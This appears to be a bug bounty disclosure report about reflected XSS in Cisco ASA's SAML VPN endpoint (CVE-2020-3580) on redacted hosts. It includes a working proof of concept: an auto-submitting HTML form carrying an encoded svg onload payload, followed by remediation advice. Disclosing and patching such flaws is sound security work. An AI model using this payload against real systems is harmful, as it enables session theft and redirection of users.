XSS DUE TO CVE-2020-3580

Hello Team, During my research, I found multiple hosts to be vulnerable to Cisco ASA XSS CVE-2020-3580, This vulnerability targets the saml service within the VPN. It is triggered via a POST request to domain/+CSCOE+/saml/sp/acs?tgname=a ## References https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe ## Impact With this vulnerability, an attacker can for example steal users cookies or redirect users on malicious website. ## System Host(s) █████ ## Affected Product(s) and Version(s) Cisco ASA ## CVE Numbers CVE-2020-3580 ## Steps to Reproduce <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://████/+CSCOE+/saml/sp/acs?tgname=a" method="POST"> <input type="hidden" name="SAMLResponse" value="&quot;&gt;&lt;svg&#47;onload&#61;alert&#40;&apos;XSS&apos;&#41;&gt;" /> <input type="hidden" name="" value="" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ## Suggested Mitigation/Remediation Actions Patch Cisco ASA : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe